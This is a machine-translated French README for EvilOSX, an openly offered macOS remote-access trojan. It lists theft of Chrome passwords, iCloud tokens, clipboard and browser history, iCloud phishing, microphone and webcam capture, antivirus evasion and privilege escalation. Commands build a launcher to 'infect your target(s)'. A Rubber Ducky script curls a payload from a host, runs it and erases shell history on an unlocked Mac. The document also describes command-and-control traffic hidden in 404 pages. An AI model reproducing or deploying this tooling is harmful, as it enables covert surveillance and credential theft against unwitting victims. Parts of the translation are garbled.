EvilOSX

Générateur Marco par Cedric Owens

• Imiter une instance terminale
• Système de module extensible simple
• Pas de dépendances en bot (pur python)
• Non détecté par antivirus (OpenSSL AES-256 Crypted charges)
• Persistant
• Soutien de l'interface graphique et de la CLI
• Récupérer les mots de passe chromés
• Récupérer les jetons et les contacts iCloud
• Récupérer / surveiller le presse-papiers
• Récupérer l'histoire du navigateur (Chrome et Safari)
• Phish pour iCloud Mots de passe via iTunes
• Énumération de sauvegarde iTunes (iOS)
• Enregistrer le microphone
• Prenez une capture d'écran ou une photo de bureau à l'aide de la webcam
• Tenter de prendre racine via l'escalade des privilèges locaux

 # Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX

# Go into the repository
$ cd EvilOSX

# Install dependencies required by the server
$ sudo pip install -r requirements.txt

# Start the GUI
$ python start.py

# Lastly, run a built launcher on your target(s)

AVERTISSEMENT: Parce que les charges utiles sont créées uniques au système cible (automatiquement par le serveur), le serveur doit être exécuté lorsqu'un bot se connecte pour la première fois.

Il y a aussi une CLI pour ceux qui veulent l'utiliser sur SSH:

 # Create a launcher to infect your target(s)
$ python start.py --builder

# Start the CLI
$ python start.py --cli --port 1337

# Lastly, run a built launcher on your target(s) 

Ce projet a été créé pour être utilisé avec mon Ducky en caoutchouc, voici le script simple:

 REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/

DELAY 1000
GUI SPACE
DELAY 500
STRING Termina
DELAY 1000
ENTER
DELAY 1500

REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'
ENTER

STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER

• Il faut environ 10 secondes pour déambuler tout mac déverrouillé, qui est ... bien
• Termina L est orthographié de cette façon intentionnellement, sur certains projecteurs de systèmes ne trouvera pas le terminal autrement.
  
• Pour contourner l'assistant de configuration du clavier, assurez-vous de modifier le VID & PID qui peut être trouvé ici.
  Le clavier en aluminium (ISO) est probablement celui que vous recherchez.

EvilOSX sera maintenu autant que possible sous les directives de version sémantique.
Les versions de serveur et de bot seront numérotées avec le format de suivi:

 <major>.<minor>.<patch>

Et construit avec les directives suivantes:

• La compatibilité en arrière (avec des bots plus anciens) baisse le major
• De nouveaux ajouts sans casser la compatibilité en arrière baissent le mineur
• Les correctifs de bogue et les modifications de mission bossent le patch

Pour plus d'informations sur SEMVER, veuillez visiter https://semver.org/.

• L'infection d'une machine est divisée en trois parties:
  • Un lanceur est exécuté sur la machine cible dont le seul objectif est d'exécuter le Stager
  • Le Stager demande au serveur un chargeur qui gère comment une charge utile sera chargée
  • Le chargeur reçoit une charge utile cryptée de manière unique puis renvoyé au stage
• Le serveur cache ses communications en envoyant des messages cachés dans les pages d'erreur HTTP 404 (de "cachette à la vue" de Blackhat)
  • Les demandes de commande sont récupérées du serveur via une demande GET
  • Les réponses de commande sont envoyées au serveur via une demande de poste
• Les modules profitent de la nature dynamique de Python, ils sont simplement envoyés sur le réseau compressé avec ZLIB, ainsi que toutes les options de configuration
• Puisque le bot ne communique qu'avec le serveur et jamais l'inverse, le serveur n'a aucun moyen de savoir quand un bot se met hors ligne

N'hésitez pas à soumettre des problèmes ou des demandes de fonctionnalités ici.

Pour un guide simple sur la façon de créer des modules, cliquez ici.

• The Awesome Empire Project
• Shoutout à Patrick Wardle pour ses formidables discussions, consultez Objective-See
• Manwoami pour ses projets: Osxchromedecrypt, Mmetokendecrypt, iCloudContacts
  (maintenant supprimé ... faites-moi savoir si vous réapparaissez)
• Le module Slowloris est à peu près copié à partir de pyslowloris
• Urwid et ce code qui m'a fait gagner beaucoup de temps avec la CLI
• Logo créé par motusora

Gplv3